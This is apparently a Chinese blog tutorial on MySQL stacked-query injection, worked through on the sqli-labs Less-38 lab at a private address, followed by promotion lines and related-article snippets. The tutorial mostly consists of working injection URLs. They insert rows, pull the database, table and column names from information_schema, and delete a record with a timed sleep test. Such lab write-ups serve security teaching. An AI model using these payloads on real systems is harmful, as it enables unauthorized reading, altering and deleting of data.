Mysql注入 -- 堆叠注入
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。
---- 网易云热评
一、堆叠注入介绍
1、多条sql语句同时执行
2、union只能执行查询语句,堆叠可以执行增删改查
3、同时执行三条语句
select 1;select 2;select 3;
二、插入注入
1、找到注入点,添加一条数据
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+
再次访问http://192.168.139.129/sqli/Less-38/?id=66
2、获取数据库名称
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+
再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称
3、获取数据库中的表名
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+
再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息
4、获取表中的字段名
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+
再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息
三、删除删除注入
http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
Mysql注入 -- 堆叠注入相关推荐
- SQL注入——堆叠注入
一.堆叠注入的原理 1.介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束.试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注 ...
- SQL注入——堆叠注入入门题:领取 iPad Pro
堆叠注入:领取 iPad Pro 初学Web安全方面内容,做了一道由学长出的SQL注入题,难度不大,适合新手了解堆叠注入.这里简单介绍一下过程. 题目如下: 首先,可以在输入框内输入数据测 ...
- SQL注入堆叠注入二次注入
蓝易云高性能服务器 | | | | |
- mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入
盲注 关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据 布尔盲注 目标地址:http://newspaper.com/items.php?id=2 对 ...
- SQL注入之堆叠注入(sql-lab第38关)
什么是堆叠注入 在SQL中,分号(;)是用来表示一条SQL语句结束的.试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入.而堆叠注入可以执行的是任 ...
- (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程
目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...
- mysql 多行拼接注入_MySQL注入汇总
Mysql注释符: 单行注释: # 在对URL使用过程中可能遇到Unicode编码问题,可常用%23代替 多行注释:/**/ 单行注释: -- 此处需要注意后面存在空格,否则报错 0.万能密码 (基于 ...
- 堆叠注入-强网杯2019随便注
靶场地址 链接(click me) 发现很友情的提示,emmm,那就先使用不同的 payload 进行测试,看下结果吧 直接点击提交,看结果,输出为一个数组,此处应有文章可做,再测试其他payload ...
- slqilabs靶场记录堆叠注入(八)
slqilabs靶场记录堆叠注入(八) Stacked injections-堆叠注入 从字面意思上来看就是一堆的sql语句一起执行.而在真实的运用中也是这样的,我们知道在mysql中,主要是在命令行 ...
最新文章
- SQL Server中的执行引擎入门
- java project 部署_关于Java Project项目在Linux下部署步骤及注意事项
- Android系统(2)---init.rc知识
- Python四:HoughCircles()霍夫变换
- kl散度与js散度_数据集相似度度量之KLamp;JS散度
- LeetCode 300. 最长上升子序列(动态规划)
- 避免内存泄露及内存的规范化使用
- 微软输入法怎么最小化到托盘_Windows下的五笔输入法哪个最好用?我来推荐几款...
- echart——时间点和时间段综合显示
- Msm8960(APQ8064)平台的MSM-AOSP-kitkat编译适配(1):基础知识
- iis 程序池设置及详解
- Android模拟器使用SD卡(2)
- Indilinx主控固态量产成功修复步骤
- 银联的跨行清算体系架构分析
- 土木工程与计算机专业考研学校排名,土木工程专业考研学校排名
- Linux文件操作命令及磁盘分区与文件系统
- 为整数线性规划(integer linear programming,ILP)
- 计算机在航空航天的应用ppt,数字图像处理技术的应用_北京航空航天大学:数字图像处理技术的应用_ppt_大学课件预览_高等教育资讯网...
- 【计算机网络:自顶向下方法】期末复习总结(USTC 2020秋 zq班)
- 医疗行业S2B2B商城系统